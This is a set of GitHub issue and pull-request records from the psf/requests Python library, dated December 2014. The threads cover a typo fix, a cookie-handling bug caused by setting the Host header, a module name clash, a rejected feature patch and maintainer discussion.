{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2382/reactions" }
https://api.github.com/repos/psf/requests/issues/2382/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2382.diff", "html_url": "https://github.com/psf/requests/pull/2382", "merged_at": "2014-12-16T09:19:50Z", "patch_url": "https://github.com/psf/requests/pull/2382.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2382" }
true
[ "Agreed! Thanks for this! :cake:\n" ]
https://api.github.com/repos/psf/requests/issues/2381
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2381/labels{/name}
https://api.github.com/repos/psf/requests/issues/2381/comments
https://api.github.com/repos/psf/requests/issues/2381/events
https://github.com/psf/requests/pull/2381
51,953,876
MDExOlB1bGxSZXF1ZXN0MjYwNDk4MzI=
2,381
Fix a typo in a comment
{ "avatar_url": "https://avatars.githubusercontent.com/u/5542943?v=4", "events_url": "https://api.github.com/users/namlede/events{/privacy}", "followers_url": "https://api.github.com/users/namlede/followers", "following_url": "https://api.github.com/users/namlede/following{/other_user}", "gists_url": "https://api.github.com/users/namlede/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/namlede", "id": 5542943, "login": "namlede", "node_id": "MDQ6VXNlcjU1NDI5NDM=", "organizations_url": "https://api.github.com/users/namlede/orgs", "received_events_url": "https://api.github.com/users/namlede/received_events", "repos_url": "https://api.github.com/users/namlede/repos", "site_admin": false, "starred_url": "https://api.github.com/users/namlede/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/namlede/subscriptions", "type": "User", "url": "https://api.github.com/users/namlede", "user_view_type": "public" }
[]
closed
true
null
[]
null
4
2014-12-15T06:37:31Z
2021-09-08T09:01:08Z
2014-12-15T07:59:47Z
CONTRIBUTOR
resolved
I just fixed a minor typo: "throws" is misspelled as "thows".
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2381/reactions" }
https://api.github.com/repos/psf/requests/issues/2381/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2381.diff", "html_url": "https://github.com/psf/requests/pull/2381", "merged_at": "2014-12-15T07:59:47Z", "patch_url": "https://github.com/psf/requests/pull/2381.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2381" }
true
[ "Thanks for this! :cake:\n", "I would make a joke about how omitting random letters is cool, but it wouldn't be funy. \n\nThanks @namlede \n", "Your wecome.\n", ":+1: \n" ]
https://api.github.com/repos/psf/requests/issues/2380
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2380/labels{/name}
https://api.github.com/repos/psf/requests/issues/2380/comments
https://api.github.com/repos/psf/requests/issues/2380/events
https://github.com/psf/requests/pull/2380
51,925,675
MDExOlB1bGxSZXF1ZXN0MjYwMzY3Nzk=
2,380
Added a save method to Response objects
{ "avatar_url": "https://avatars.githubusercontent.com/u/6031925?v=4", "events_url": "https://api.github.com/users/syndbg/events{/privacy}", "followers_url": "https://api.github.com/users/syndbg/followers", "following_url": "https://api.github.com/users/syndbg/following{/other_user}", "gists_url": "https://api.github.com/users/syndbg/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/syndbg", "id": 6031925, "login": "syndbg", "node_id": "MDQ6VXNlcjYwMzE5MjU=", "organizations_url": "https://api.github.com/users/syndbg/orgs", "received_events_url": "https://api.github.com/users/syndbg/received_events", "repos_url": "https://api.github.com/users/syndbg/repos", "site_admin": false, "starred_url": "https://api.github.com/users/syndbg/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/syndbg/subscriptions", "type": "User", "url": "https://api.github.com/users/syndbg", "user_view_type": "public" }
[]
closed
true
null
[]
null
4
2014-12-14T17:46:51Z
2021-09-08T09:01:09Z
2014-12-14T17:55:50Z
NONE
resolved
Added an easy way to save content on the File System. Should I write a test for this? I didn't find a test for `iter_content` so that's why I skipped testing `save`.
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2380/reactions" }
https://api.github.com/repos/psf/requests/issues/2380/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2380.diff", "html_url": "https://github.com/psf/requests/pull/2380", "merged_at": null, "patch_url": "https://github.com/psf/requests/pull/2380.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2380" }
true
[ "Thanks for this @syndbg! Unfortunately, we're in feature freeze, so we won't be accepting this patch. Sorry, and thanks for the work!\n", "No problems, @Lukasa !\n\nCan I help you somehow? I'm assuming a feature freeze is applied to fix bugs. \n", "If you see any open bugs you'd like to work on, feel free, we are happy to merge those. =)\n", "And in the interest of full disclosure a lot of bugs that are categorized are probably waiting for us to start developing 3.0 (which is not a feature release but something we're doing to break some existing features in a backwards incompatible way). Other bugs may not be entirely decided upon so resurrecting discussions would be a good idea. Please do this to make sure you're working on a bug and not just something we forgot to close.\n" ]
https://api.github.com/repos/psf/requests/issues/2379
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2379/labels{/name}
https://api.github.com/repos/psf/requests/issues/2379/comments
https://api.github.com/repos/psf/requests/issues/2379/events
https://github.com/psf/requests/pull/2379
51,816,271
MDExOlB1bGxSZXF1ZXN0MjU5Nzk3NzQ=
2,379
utils.guess_filename fails if the given parameter looks like a file object but has a non-string name attribute
{ "avatar_url": "https://avatars.githubusercontent.com/u/973454?v=4", "events_url": "https://api.github.com/users/arthurdarcet/events{/privacy}", "followers_url": "https://api.github.com/users/arthurdarcet/followers", "following_url": "https://api.github.com/users/arthurdarcet/following{/other_user}", "gists_url": "https://api.github.com/users/arthurdarcet/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/arthurdarcet", "id": 973454, "login": "arthurdarcet", "node_id": "MDQ6VXNlcjk3MzQ1NA==", "organizations_url": "https://api.github.com/users/arthurdarcet/orgs", "received_events_url": "https://api.github.com/users/arthurdarcet/received_events", "repos_url": "https://api.github.com/users/arthurdarcet/repos", "site_admin": false, "starred_url": "https://api.github.com/users/arthurdarcet/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/arthurdarcet/subscriptions", "type": "User", "url": "https://api.github.com/users/arthurdarcet", "user_view_type": "public" }
[]
closed
true
null
[]
null
13
2014-12-12T15:16:43Z
2021-09-08T09:01:02Z
2014-12-13T19:49:04Z
CONTRIBUTOR
resolved
A cherrypy uploaded file behave like a regular file, except that its name attribute is an int and passing it directly to requests fails because of that (not sure if i should add myself to AUTHORS for this?)
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2379/reactions" }
https://api.github.com/repos/psf/requests/issues/2379/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2379.diff", "html_url": "https://github.com/psf/requests/pull/2379", "merged_at": "2014-12-13T19:49:04Z", "patch_url": "https://github.com/psf/requests/pull/2379.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2379" }
true
[ "I'm +0 on this if only because no one else has found this before and it would seem to be a bigger problem otherwise. It seems entirely harmless, but CherryPy seems to be an outlier in how it behaves here. Perhaps this is more appropriately a bug in CherryPy\n", "Yeah, that's weird. Why would its name attribute be an int? I could understand a string representation of a number, but an int? Very weird. \n", "@arthurdarcet have you reported this as a bug to CherryPy?\n", "Also this causes something of a regression. `name` could still be an instance of `builtin_str` but also be `''` which doesn't cause an exception but introduces backwards incompatible behaviour. Where we previously returned `None`, we will now return `''` which might create issues with what we end up generating with this function.\n", "Poc, which will output `<class 'int'> 11`\n\n``` python\n#!/usr/bin/env python\nimport cherrypy, requests\n\nclass Root(object):\n @cherrypy.expose\n def index(self, infile):\n print(type(infile.file.name), repr(infile.file.name))\ncherrypy.tree.mount(Root(), '/', {})\n\ncherrypy.engine.start()\nrequests.post('http://localhost:8080/', files={'infile': open(__file__)})\ncherrypy.engine.exit()\n```\n", "I've updated the commit to make sure no backward incompatible changes are introduced.\n\nI haven't reported this to cherrypy because they are only specifying that they give a file-like object with a read method, nothing more, and since name isn't part of their API it's not really a bug on their side.\n\nI agree that an int as a file name is weird to say the least, but imho requests should check that file.name indeed quack like a duck before using it like a duck.\n", "@arthurdarcet I respectfully disagree that this isn't a bug on their side.\n", "See also: https://bitbucket.org/cherrypy/cherrypy/issue/1346/uploaded-files-name-is-an-integer\n", "Hi Ian,\n\nThank you for reporting this to cherrypy, I was planning to but I haven't\nfound the time to look into it.\nI agree \nthat integer file names should be considered a bug on cherrypy side\nbut I think this patch would only make requests a bit more resilient and is\nrelevant regardless of cherrypy issue\n\nOn Saturday, 13 December 2014, Ian Cordasco [email protected]\nwrote:\n\n> See also:\n> https://bitbucket.org/cherrypy/cherrypy/issue/1346/uploaded-files-name-is-an-integer\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/pull/2379#issuecomment-66860416\n> .\n", "I agree @arthurdarcet. I just did not want the cherrypy issue to go unreported.\n", "This makes requests no longer recognize unicode filename as valid under Python 2. See #2411.\n\nEDIT: Actual English sentence!\n", "@sjagoe come again?\n", "Edited my hastily written comment. Opening an actual issue now.\n" ]
https://api.github.com/repos/psf/requests/issues/2378
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2378/labels{/name}
https://api.github.com/repos/psf/requests/issues/2378/comments
https://api.github.com/repos/psf/requests/issues/2378/events
https://github.com/psf/requests/issues/2378
51,786,762
MDU6SXNzdWU1MTc4Njc2Mg==
2,378
readlines (without generators)
{ "avatar_url": "https://avatars.githubusercontent.com/u/5049737?v=4", "events_url": "https://api.github.com/users/femtotrader/events{/privacy}", "followers_url": "https://api.github.com/users/femtotrader/followers", "following_url": "https://api.github.com/users/femtotrader/following{/other_user}", "gists_url": "https://api.github.com/users/femtotrader/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/femtotrader", "id": 5049737, "login": "femtotrader", "node_id": "MDQ6VXNlcjUwNDk3Mzc=", "organizations_url": "https://api.github.com/users/femtotrader/orgs", "received_events_url": "https://api.github.com/users/femtotrader/received_events", "repos_url": "https://api.github.com/users/femtotrader/repos", "site_admin": false, "starred_url": "https://api.github.com/users/femtotrader/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/femtotrader/subscriptions", "type": "User", "url": "https://api.github.com/users/femtotrader", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-12-12T09:40:28Z
2021-09-08T23:06:50Z
2014-12-12T16:21:22Z
NONE
resolved
Hello, I'm moving some Python code from `urlopen` to `requests` (because it will be easier for me to add a db cache (SQLite) mechanism using requests-cache) The code I want to modify looks like ``` with urlopen(url) as resp: lines = resp.readlines() ``` I don't find any equivalent to `readlines()` Any idea ? I have found a generator solution like ``` import requests import requests_cache requests_cache.install_cache('cache', backend='sqlite', expire_after=60*5) response = requests.get('http://finance.yahoo.com/d/quotes.csv?s=AAPL+F&f=l1srs7t1p2', stream=True) for line in response.iter_lines(): print(line) ``` but requests_cache doesn't seems to like this stream parameter see https://github.com/reclosedev/requests-cache/issues/33 So there is 2 solutions (and both can be valuable). 1. fix requests-cache : that's what I'm asking to @reclosedev 2. provide a request readlines() method (or give a tip to have something like that which will return a list and not a generator) That will be very nice. Thanks for requests... that's a great lib for humans
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2378/reactions" }
https://api.github.com/repos/psf/requests/issues/2378/timeline
null
completed
null
null
false
[ "We will not be providing a `readlines` method. This is most certainly a bug in requests-cache and one I haven't seen or heard of in [CacheControl](https://github.com/ionrock/cachecontrol) which is our recommended caching library.\n\nFor what it's worth you can do:\n\n``` python\nimport requests\n\nwith requests.get(url, stream=True) as resp:\n lines = list(resp.iter_lines())\n```\n\nThat will give you a list of lines, but it will not fix the requests-cache bug, because that's a bug in that caching library.\n" ]
https://api.github.com/repos/psf/requests/issues/2377
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2377/labels{/name}
https://api.github.com/repos/psf/requests/issues/2377/comments
https://api.github.com/repos/psf/requests/issues/2377/events
https://github.com/psf/requests/issues/2377
51,670,274
MDU6SXNzdWU1MTY3MDI3NA==
2,377
Set Cookie does not work properly with HTTP 302
{ "avatar_url": "https://avatars.githubusercontent.com/u/10153173?v=4", "events_url": "https://api.github.com/users/antoniofelleca/events{/privacy}", "followers_url": "https://api.github.com/users/antoniofelleca/followers", "following_url": "https://api.github.com/users/antoniofelleca/following{/other_user}", "gists_url": "https://api.github.com/users/antoniofelleca/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/antoniofelleca", "id": 10153173, "login": "antoniofelleca", "node_id": "MDQ6VXNlcjEwMTUzMTcz", "organizations_url": "https://api.github.com/users/antoniofelleca/orgs", "received_events_url": "https://api.github.com/users/antoniofelleca/received_events", "repos_url": "https://api.github.com/users/antoniofelleca/repos", "site_admin": false, "starred_url": "https://api.github.com/users/antoniofelleca/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/antoniofelleca/subscriptions", "type": "User", "url": "https://api.github.com/users/antoniofelleca", "user_view_type": "public" }
[]
closed
true
null
[]
null
8
2014-12-11T10:31:05Z
2021-09-08T23:06:49Z
2014-12-18T23:22:51Z
NONE
resolved
Python Requests 2.4.3 Python 3.4 - windows 7 (64 bit) Scenario: Performing this request: GET on URL: http://fantacalcio.repubblica.it/login.phpSSID=exjlkfpnaqaqpzqrrrzxjehfxpravrhdvjzjrkqpkraqdpee I send this Header: {'Pragma': 'max-age=0', 'Origin': 'https://login.kataweb.it', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 'Accept-Language': 'it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4,es;q=0.2', 'Host': 'login.kataweb.it', 'Cache-Control': 'no-cache', 'Referer': 'https://login.kataweb.it/registrazione/repubblicafantacalcio/login.jsp?ssoOnly=false&backurl=http%3A%2F%2Fwww.fantacalcio.kataweb.it%2Fsocial%2Fsites%2Ffantacalcio%2Ffantacalciosocial%2Fcampionato%2Floader.php%3FmClose%3D2%26backUrl%3Dhttp%253A%2F%2Ffantacalcio.repubblica.it%2Flogin.php&optbackurl=http%3A%2F%2Fwww.fantacalcio.kataweb.it%2Fsocial%2Fsites%2Ffantacalcio%2Ffantacalciosocial%2Fcampionato%2Floader.php%3FmClose%3D2%26backUrl%3Dhttp%253A%2F%2Ffantacalcio.repubblica.it%2Flogin.php', 'Accept-Encoding': 'gzip,deflate,sdch', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,_/_;q=0.8', 'Proxy-Connection': 'keep-alive', 'Connection': 'keep-alive'} and I receive this answer: (a HTTP 302) with header: {'Expires': 'Thu, 11 Dec 2014 10:22:37 GMT', 'Set-Cookie': 'fantarep_new=0298b7c7bdd9d45ecf5749e8c1fdd5_383207; expires=Fri, 12-Dec-2014 10:22:38 GMT; path=/; domain=.fantacalcio.repubblica.it', 'Age': '0', 'X-Cacheable': 'NO:Not Cacheable', 'Accept-Ranges': 'bytes', 'Content-Length': '20', 'Content-Type': 'text/html', 'Proxy-Connection': 'keep-alive', 'X-Cache-Lookup': 'MISS from proxy1.altranit.corp.altran.com:8080', 'X-Cache': 'MISS from proxy1.altranit.corp.altran.com', 'Via': '1.0 proxy1.altranit.corp.altran.com:8080 (squid/2.6.STABLE21)', 'Vary': 'Accept-Encoding', 'Content-Encoding': 'gzip', 'Server': 'Apache', 'Date': 'Thu, 11 Dec 2014 10:22:38 GMT', 'Cache-Control': 'max-age=0', 'Location': 'index.php?page=sqdlist&ck_fantacalcio=0298b7c7bdd9d45ecf5749e8c1fdd5&global=0&first=1'} I've this Cookies (BEFORE THE REQUEST IS PERFORMED) {'FCSOCIAL': 'FCSOCIAL_bb828ef8c292284073012f2931d739', 'gac_3_8ODxzU7xh4eFL2a_mtwjaR5JKoyX0az0MLmAfUYg8kCc2Eo63vmDP9Z3tSI7lS0h': 'VC1_E4E1B47C0B7B0D2C71751CA6855405AF_c718efX2eyW82F0KfQyyZN6hRDxp-4Gn7zYqHu-PRsb2SxHyopuk99ljuVBhks6c8E5PtMxYZEUy0IATFSkvHUPiuc4eqRyUMAYrmQLwDOy_72I4tzk6xOpSJf3s1pLTekn-zZ-TYnkIsk0vsWeHWQ%3D%3D', 'KWSSO': '"{hashId:4648b93f7efac4f16581aab27b7396e4,sessionId:1418293351099,criptKey:1ADBC72C64E0735AA89F96D77294AC827267F01B8FF4397D8D7095B4FD591E59E7033A46928DC087726DB1602EFCFCC5C1FE4A5C0E378C7C}"', 'JSESSIONID': 'F1124C14EE69AF8794998C5BF4BF65D6'} BUT the SET COOKIE --> 'fantarep_new=0298b7c7bdd9d45ecf5749e8c1fdd5_383207; is ignored. The http_session.cookies.get_dict()) after the 302 does not return the list updated. Hoping can help
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2377/reactions" }
https://api.github.com/repos/psf/requests/issues/2377/timeline
null
completed
null
null
false
[ "Can you run your code and then do this please?\n\n``` python\nfor h in r.history:\n print h.status_code\n print h.headers\n print h.request.headers\n```\n", "## Your problem is that you're specifying the Host header. We special case cookie parsing when you do that.\n\nSent from my Android device with K-9 Mail. Please excuse my brevity.\n", "Lukasa, your code does not produce anything... I'm sure that it's my fault.\n\nI have:\n\nmysession=Session()\n......[SOME CODE]\nmyget=mysession.get(nexturl, proxies=myproxy,allow_redirects=False)\nprint_details(mysession,\"GET\",myget)\n\nwhere with print_details I have a function designed just to debug:\n\ndef print_details(http_session,metodo,http_request):\n print(\"\\n METODO:\",metodo)\n print(\"URL:\",http_request.url)\n print(\"HEADER RICHIESTA:\",http_session.headers)\n print(\"CODICE RISPOSTA:\",http_request.status_code)\n print(\"COOKIES SESSIONE:\",http_session.cookies.get_dict())\n print(\"HEADER RISPOSTA:\",http_request.headers)\n\nI'm less than newbie in Python, but I've noted that if a HTTP response have more than one SET_COOKIE the second one is not considered. (this is an additional problem...that I'd like to investigate more before open a bug)\n\nThank you for your patience\n", "This is a direct consequence of supportiing https://github.com/kennethreitz/requests/issues/1638. You should remove your `Host` header that you specify and _then_ this should just work @antoniofelleca \n", "Ok, I'll try. \n\nBut the result is that is not possible to specify a header?\n\nIs it correct?\n\nThanks\n", "You should almost never specify the `Host` header. You _can_ specify other headers. You _can_ specify the `Host` header, but you _should not_ specify it, especially if you want requests to handle these cookies for you\n", "@antoniofelleca any updates?\n", "Hi,\n\nI've run some tests: sigmavirus24 was right! 
Without specifying HOST header both issues disappear.\n\nAny server header with a double SET COOKIE was correctly handled, and the set cookie in 302 work fine.\n\nLet me thank you for your support and patience. Probably this [correct] behaviour should be descripted: I've met some discussions on Stackoverflow reporting this (false)issue.\n" ]
https://api.github.com/repos/psf/requests/issues/2376
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2376/labels{/name}
https://api.github.com/repos/psf/requests/issues/2376/comments
https://api.github.com/repos/psf/requests/issues/2376/events
https://github.com/psf/requests/issues/2376
51,559,396
MDU6SXNzdWU1MTU1OTM5Ng==
2,376
AttributeError: 'module' object has no attribute 'python_implementation'
{ "avatar_url": "https://avatars.githubusercontent.com/u/914786?v=4", "events_url": "https://api.github.com/users/reddypdl/events{/privacy}", "followers_url": "https://api.github.com/users/reddypdl/followers", "following_url": "https://api.github.com/users/reddypdl/following{/other_user}", "gists_url": "https://api.github.com/users/reddypdl/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/reddypdl", "id": 914786, "login": "reddypdl", "node_id": "MDQ6VXNlcjkxNDc4Ng==", "organizations_url": "https://api.github.com/users/reddypdl/orgs", "received_events_url": "https://api.github.com/users/reddypdl/received_events", "repos_url": "https://api.github.com/users/reddypdl/repos", "site_admin": false, "starred_url": "https://api.github.com/users/reddypdl/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/reddypdl/subscriptions", "type": "User", "url": "https://api.github.com/users/reddypdl", "user_view_type": "public" }
[ { "color": "e11d21", "default": false, "description": null, "id": 136589914, "name": "Needs Info", "node_id": "MDU6TGFiZWwxMzY1ODk5MTQ=", "url": "https://api.github.com/repos/psf/requests/labels/Needs%20Info" } ]
closed
true
null
[]
null
2
2014-12-10T13:44:15Z
2021-09-08T23:06:50Z
2014-12-11T07:22:59Z
NONE
resolved
``` Python 2.7.3 (default, Feb 27 2014, 19:58:35) [GCC 4.6.3] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> import requests >>> req = requests.request('GET', 'http://httpbin.org/get') Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/home/symbol/python2.7.3/local/lib/python2.7/site-packages/requests/api.py", line 48, in request session = sessions.Session() File "/home/symbol/python2.7.3/local/lib/python2.7/site-packages/requests/sessions.py", line 284, in __init__ self.headers = default_headers() File "/home/symbol/python2.7.3/local/lib/python2.7/site-packages/requests/utils.py", line 552, in default_headers 'User-Agent': default_user_agent(), File "/home/symbol/python2.7.3/local/lib/python2.7/site-packages/requests/utils.py", line 521, in default_user_agent _implementation = platform.python_implementation() AttributeError: 'module' object has no attribute 'python_implementation' ```
{ "avatar_url": "https://avatars.githubusercontent.com/u/914786?v=4", "events_url": "https://api.github.com/users/reddypdl/events{/privacy}", "followers_url": "https://api.github.com/users/reddypdl/followers", "following_url": "https://api.github.com/users/reddypdl/following{/other_user}", "gists_url": "https://api.github.com/users/reddypdl/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/reddypdl", "id": 914786, "login": "reddypdl", "node_id": "MDQ6VXNlcjkxNDc4Ng==", "organizations_url": "https://api.github.com/users/reddypdl/orgs", "received_events_url": "https://api.github.com/users/reddypdl/received_events", "repos_url": "https://api.github.com/users/reddypdl/repos", "site_admin": false, "starred_url": "https://api.github.com/users/reddypdl/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/reddypdl/subscriptions", "type": "User", "url": "https://api.github.com/users/reddypdl", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2376/reactions" }
https://api.github.com/repos/psf/requests/issues/2376/timeline
null
completed
null
null
false
[ "@reddypdl can you do `python -c 'import platform; print(platform.python_implementation())'`, if not can you tell us how you built this version of Python? The `platform` module is a standard library module and `platform.python_implementation()` has been around since Python 2.3 so if this is a real version of Python 2.7, then that function should be present. Also is it possible you have a `platform.py` file in the same directory? If so, please rename it.\n", "Thanks sigmavirus24 , i had a python package called platform in the same folder , so it was picking-up automatically. \n" ]
https://api.github.com/repos/psf/requests/issues/2375
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2375/labels{/name}
https://api.github.com/repos/psf/requests/issues/2375/comments
https://api.github.com/repos/psf/requests/issues/2375/events
https://github.com/psf/requests/pull/2375
51,382,319
MDExOlB1bGxSZXF1ZXN0MjU3MTYxMjc=
2,375
Copy pip's import machinery wholesale
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[ { "color": "e10c02", "default": false, "description": null, "id": 117744, "name": "Bug", "node_id": "MDU6TGFiZWwxMTc3NDQ=", "url": "https://api.github.com/repos/psf/requests/labels/Bug" } ]
closed
true
null
[]
null
39
2014-12-09T02:58:42Z
2021-09-08T09:01:00Z
2015-01-09T20:38:31Z
CONTRIBUTOR
resolved
Fedora and Debian have both recently added symlinks to their distributions of requests so people can do `from requests.packages import urllib3` but they seem to still rewrite our import statements. So the following situation is possible: - User registers adapter for custom scheme - User does the following: ``` python from requests.packages.urllib3 import poolmanager poolmanager.pool_classes_by_scheme['glance+https'] = HTTPSConectionPool ``` - When they do `s.get('glance+https://...')` they see a `KeyError` because the urllib3 we're using in requests is not the one they've imported (according to `sys.modules`). Pip works around this with the copied machinery. The tests seem to work just fine for me. I still need to test this with our vendored packages removed and urllib3/chardet installed separately. /cc @dstufft @eriolv @ralphbean
